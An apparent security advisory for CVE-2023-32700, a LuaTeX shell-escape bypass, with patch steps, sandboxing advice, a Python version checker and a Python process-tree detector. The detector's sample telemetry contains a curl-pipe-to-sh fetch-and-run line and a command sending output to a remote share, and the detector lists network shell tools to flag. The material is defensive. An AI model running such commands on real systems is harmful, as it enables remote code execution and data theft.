CVE-2023-32700
📋 TL;DR
LuaTeX before 1.17.0 lets a TeX document run arbitrary shell commands when it is compiled, even when shell escape is disabled or restricted: per the CVE description, luatex-core.lua left the original, unrestricted io.popen reachable from document Lua code. Any installation of LuaTeX, TeX Live (before 2023 r66984) or MiKTeX (before 23.5) that compiles documents from untrusted sources is affected, and the injected commands run with the privileges of whoever invoked the compiler.
💻 Affected Systems
- LuaTeX
- TeX Live
- MiKTeX
📦 What is this software?
LuaTeX (LuaTeX project) is a TeX engine with an embedded Lua interpreter; document code can reach Lua through \directlua, which is why a document can attempt shell access at all. TeX Live and MiKTeX are TeX distributions that ship LuaTeX (TeX Live's lualatex runs the HarfBuzz build luahbtex, built from the same source), so their users are affected through the bundled binaries.
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary commands run with the privileges of the user or service account that invoked LuaTeX. On a shared build host or document service this means theft of other users' documents and credentials, ransomware deployment, or lateral movement from the host.
Likely Case
Code execution as the compiling user in any environment that builds documents submitted by others: shared TeX build hosts, online editors, academic submission systems, or CI/CD pipelines. Privilege escalation only arises where LuaTeX runs under a more privileged account than the document's author.
If Mitigated
Limited impact if only documents from trusted sources are compiled, or if compilation is isolated (separate unprivileged user, container without network or secrets) so that an injected command has nothing worth reaching.
🎯 Exploit Status
Exploitation requires the victim to compile a malicious TeX file with a vulnerable engine, whether invoked directly as luatex, indirectly as lualatex, or by a build service on the victim's behalf. No authentication or special privileges are needed beyond getting the file compiled, and the shell_escape setting does not block it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: LuaTeX 1.17.0, TeX Live 2023 r66984, MiKTeX 23.5
Vendor Advisory: https://tug.org/pipermail/tex-live/2023-May/049188.html
Restart Required: No
Instructions:
1. TeX Live: run tlmgr update --self --all (or install a TeX Live 2023 snapshot at r66984 or later). Distribution packages such as Fedora's are patched through the distribution's own updates.
2. MiKTeX: update to 23.5 or later through MiKTeX Console.
3. Standalone LuaTeX builds: rebuild from the 1.17.0 tag or later.
4. Verify with luatex --version (and luahbtex --version where lualatex uses it): the first line must report 1.17.0 or later.
🔧 Temporary Workarounds
Sandbox TeX compilation
Run the engine in a disposable container with no network and with only the document directory mounted. This contains what an injected command can reach (no secrets, no home directory, no network); it does not stop the command from running, and a writable bind mount is still exposed to it. The engine to sandbox is the one that is actually vulnerable, so invoke lualatex or luatex rather than pdflatex:
docker run --rm --network none -v "$(pwd)":/workdir -w /workdir texlive/texlive:latest lualatex document.tex
Disable LuaTeX shell access
Tightening shell_escape in texmf.cnf is not a workaround: this bug is a bypass of that restriction. LuaTeX's documented --safer option removes os.execute, io.popen and related functions from the Lua environment at startup, which is what "set os.execute = nil" amounts to in practice; treat it as defence in depth rather than a verified fix for this CVE, and expect shell-escape based workflows (minted, gnuplot and similar) to fail under it.
🧯 If You Can't Patch
- Process TeX files only from trusted sources with verified integrity.
- Do not rely on scanning documents for \directlua, io.popen or similar strings: Lua is a full language and the call can be assembled at runtime, so there is no reliable sanitiser for TeX input. Isolate instead: compile under a dedicated unprivileged user, or in a throwaway container without network access or access to secrets.
🔍 How to Verify
Check if Vulnerable:
Run luatex --version (and luahbtex --version, which lualatex uses in TeX Live) and read the first line, "This is LuaTeX, Version X.Y.Z (...)". Anything below 1.17.0 is vulnerable. The same check applies to TeX Live and MiKTeX, because the flawed luatex-core.lua is built into the engine binary. On TeX Live, tlmgr info luatex additionally shows the installed package revision for comparison with the fixed build r66984.
Check Version:
luatex --version
Verify Fix Applied:
After updating, confirm the reported versions: LuaTeX 1.17.0 or later (every LuaTeX-based binary, not just luatex), TeX Live 2023 r66984 or later, MiKTeX 23.5 or later.
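The version comparison above is easy to get wrong by hand (the banner is free text, and "1.9.0" sorts after "1.17.0" as a string). The following is an added example, not part of the advisory or of the LuaTeX project: it parses the first line of luatex --version into integer components, compares them against 1.17.0, and can be pointed at the engines installed on the host. The banner strings it contains are constructed in the shape LuaTeX prints, and the "1.9.0" one is synthetic, included only to show the string-ordering pitfall.

```python
"""Check whether a LuaTeX banner (or installed binary) predates the 1.17.0 fix.

Added example for CVE-2023-32700; not code from the advisory or from LuaTeX.
"""
import re
import shutil
import subprocess
from typing import Dict, Optional, Tuple

# First version that contains the fix (LuaTeX 1.17.0 per the advisory).
FIXED_VERSION: Tuple[int, int, int] = (1, 17, 0)

# `luatex --version` starts with "This is LuaTeX, Version 1.16.0 (TeX Live 2023)";
# pre-1.0 builds printed "Version beta-0.95.0", which this also accepts.
VERSION_RE = re.compile(r"This is LuaTeX, Version (?:beta-)?(\d+)\.(\d+)\.(\d+)")

# Constructed sample banners (shape only; the 1.9.0 release is synthetic).
SAMPLE_BANNERS: Dict[str, str] = {
    "texlive_2023_old": "This is LuaTeX, Version 1.16.0 (TeX Live 2023)\n"
                        "Execute  'luatex --credits'  for credits and version details.\n",
    "texlive_2023_fixed": "This is LuaTeX, Version 1.17.0 (TeX Live 2023)\n",
    "miktex_23_5": "This is LuaTeX, Version 1.17.0 (MiKTeX 23.5)\n",
    "synthetic_1_9_0": "This is LuaTeX, Version 1.9.0 (constructed)\n",
}


def parse_luatex_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from the banner, or None if it is not LuaTeX."""
    m = VERSION_RE.search(banner)
    if m is None:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def is_vulnerable(banner: str) -> Optional[bool]:
    """True if the banner reports a version below 1.17.0, False if fixed,
    None if the text is not a LuaTeX banner (e.g. pdfTeX's).

    Comparison is on integer tuples: comparing the strings would order
    "1.9.0" after "1.17.0" and call a vulnerable engine fixed.
    """
    version = parse_luatex_version(banner)
    if version is None:
        return None
    return version < FIXED_VERSION


def check_installed_engines(names=("luatex", "luahbtex", "luajittex")) -> Dict[str, Optional[bool]]:
    """Run --version on each LuaTeX-based binary found on PATH.

    Result per engine: True (vulnerable), False (fixed), None (not installed or
    banner not recognised). All three names are built from the same source tree,
    so every one present on the host must report 1.17.0 or later.
    """
    results: Dict[str, Optional[bool]] = {}
    for name in names:
        path = shutil.which(name)
        if path is None:
            results[name] = None
            continue
        proc = subprocess.run([path, "--version"], capture_output=True, text=True, timeout=30)
        results[name] = is_vulnerable(proc.stdout)
    return results


if __name__ == "__main__":
    for engine, state in check_installed_engines().items():
        label = {True: "VULNERABLE (< 1.17.0)", False: "fixed", None: "not found / unrecognised"}[state]
        print(f"{engine}: {label}")
```

Run it on the build host itself; a None for luahbtex on a TeX Live system usually means the binary directory is not on PATH for the account running the check, which is worth fixing before trusting the result.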
📡 Detection & Monitoring
Log Indicators:
- Shell interpreters (sh, bash, cmd.exe, powershell.exe) or network tools (curl, wget, nc) started by luatex, luahbtex, luajittex or dvilualatex when the job was not run with --shell-escape
- Compilation of documents from untrusted sources (new submitters, unfamiliar repositories) immediately followed by such process activity
- Any child process of a TeX engine other than the distribution's own helpers (kpsewhich, mktex* font generation)
Network Indicators:
- Outbound connections originating from a LuaTeX process tree; a document build has no reason to talk to the network
- Unexpected uploads or large transfers during document processing
SIEM Query:
Process creation where the parent image name is one of luatex, luahbtex, luajittex, texlua, lualatex or dvilualatex and the child is a shell (sh, bash, cmd.exe, powershell.exe) or a network tool (curl, wget, nc). Match the parent on its full image name, not on the substring "tex": that also fires on editors such as texstudio, which legitimately spawn a shell to run the build. Baseline before alerting: documents built with --shell-escape (minted, gnuplot) spawn shells by design, and TeX engines routinely spawn kpsewhich and mktex* helpers.
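The query above, as detection logic run over sample process-creation events. This is an added example, not part of the advisory or of any SIEM product: the event shape (parent_image, parent_cmdline, image, cmdline) is a generic one that you map your own telemetry onto (Sysmon event 1, auditd execve, EDR process events), the EXPECTED_CHILDREN allowlist is an assumption to extend from your own baseline, and the events themselves are constructed, not real logs. It shows the two refinements the query needs in practice: matching the parent by image name rather than the substring "tex", and downgrading shells spawned under --shell-escape to an informational record instead of an alert.

```python
"""Flag shell/network children of LuaTeX processes in process-creation events.

Added example for CVE-2023-32700; the event shape and the allowlist are
assumptions, and SAMPLE_EVENTS is constructed telemetry, not real logs.
"""
import re
from typing import Optional

# Binaries built from the LuaTeX source tree. The same Lua io.popen code path is
# reached whichever of these names the engine is invoked under. Assumption: your
# telemetry records the executed image path, not only argv[0].
LUATEX_IMAGES = {
    "luatex", "luahbtex", "luajittex", "luajithbtex",
    "lualatex", "dvilualatex", "texlua", "texluajit",
}

# Children that should never appear under a restricted-shell-escape LuaTeX run.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd", "powershell", "pwsh"}
NET_TOOLS = {"curl", "wget", "nc", "ncat", "socat"}

# Helpers a TeX engine legitimately spawns on demand (path lookups, font
# generation). Assumed allowlist for this example; extend it from your baseline.
EXPECTED_CHILDREN = {"kpsewhich", "mktextfm", "mktexpk", "mktexmf", "mktexlsr", "mktexfmt"}


def normalize_image(path: str) -> str:
    """Basename of a Linux or Windows image path, lowercased, without .exe."""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(event: dict) -> Optional[dict]:
    """Return an alert for one process-creation event, or None if benign."""
    parent = normalize_image(event["parent_image"])
    child = normalize_image(event["image"])
    # Match the parent on its full image name: a substring test on "tex" would
    # also fire on editors (texstudio) and on unrelated tools.
    if parent not in LUATEX_IMAGES or child in EXPECTED_CHILDREN:
        return None
    if child in SHELLS:
        kind = "shell"
    elif child in NET_TOOLS:
        kind = "network tool"
    else:
        return None
    # A job run with --shell-escape is allowed to spawn shells: record it for
    # baselining. Without that flag a shell child means the shell_escape
    # restriction was bypassed, which is exactly this CVE's behaviour.
    shell_escape = "--shell-escape" in event.get("parent_cmdline", "")
    return {
        "severity": "info" if shell_escape else "high",
        "parent": parent,
        "child": child,
        "kind": kind,
        "cmdline": event.get("cmdline", ""),
    }


def detect(events: list) -> list:
    """Run classify() over a batch of events and return the alerts in order."""
    return [alert for alert in (classify(e) for e in events) if alert is not None]


# Constructed sample telemetry in the generic shape described above.
SAMPLE_EVENTS = [
    {   # untrusted paper.tex under default (restricted) shell escape spawns a shell: high
        "parent_image": "/usr/local/texlive/2023/bin/x86_64-linux/luahbtex",
        "parent_cmdline": "luahbtex --fmt=lualatex paper.tex",
        "image": "/bin/sh",
        "cmdline": "sh -c 'curl -s http://192.0.2.10/p | sh'",
    },
    {   # distribution helper spawned by the engine: allowlisted, no alert
        "parent_image": "/usr/local/texlive/2023/bin/x86_64-linux/luahbtex",
        "parent_cmdline": "luahbtex --fmt=lualatex paper.tex",
        "image": "/usr/local/texlive/2023/bin/x86_64-linux/kpsewhich",
        "cmdline": "kpsewhich -var-value=TEXMFVAR",
    },
    {   # minted build with --shell-escape: legitimate shell child, recorded as info
        "parent_image": "/usr/local/texlive/2023/bin/x86_64-linux/luahbtex",
        "parent_cmdline": "luahbtex --shell-escape --fmt=lualatex thesis.tex",
        "image": "/bin/sh",
        "cmdline": "sh -c 'pygmentize -f latex -l python'",
    },
    {   # an editor launching a build: name contains "tex" but is not the engine
        "parent_image": "/usr/bin/texstudio",
        "parent_cmdline": "texstudio thesis.tex",
        "image": "/bin/sh",
        "cmdline": "sh -c 'lualatex -synctex=1 thesis.tex'",
    },
    {   # MiKTeX on Windows: same rule across Windows paths and the .exe suffix
        "parent_image": "C:\\Program Files\\MiKTeX\\miktex\\bin\\x64\\luatex.exe",
        "parent_cmdline": "luatex.exe report.tex",
        "image": "C:\\Windows\\System32\\cmd.exe",
        "cmdline": "cmd.exe /c whoami > \\\\192.0.2.10\\share\\w.txt",
    },
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['parent']} -> {alert['child']} ({alert['kind']}): {alert['cmdline']}")
```

Against the constructed events this yields two high alerts (the Linux and Windows shells under a restricted job) and one informational record (the --shell-escape build); the kpsewhich helper and the editor-launched shell produce nothing. A "high" here is worth an immediate look even after patching, because a shell under a non-shell-escape job should not happen on a fixed engine either.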
🔗 References
- https://github.com/TeX-Live/texlive-source/releases/tag/build-svn66984
- https://gitlab.lisn.upsaclay.fr/texlive/luatex/-/tags/1.17.0
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLY43MIRONJSJVNBDFQHQ26MP3JIOB3H/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TF6YXUUFRGBIXIIIEV5SGBJXXT2SMUK5/
- https://tug.org/pipermail/tex-live/2023-May/049188.html
- https://tug.org/~mseven/luatex.html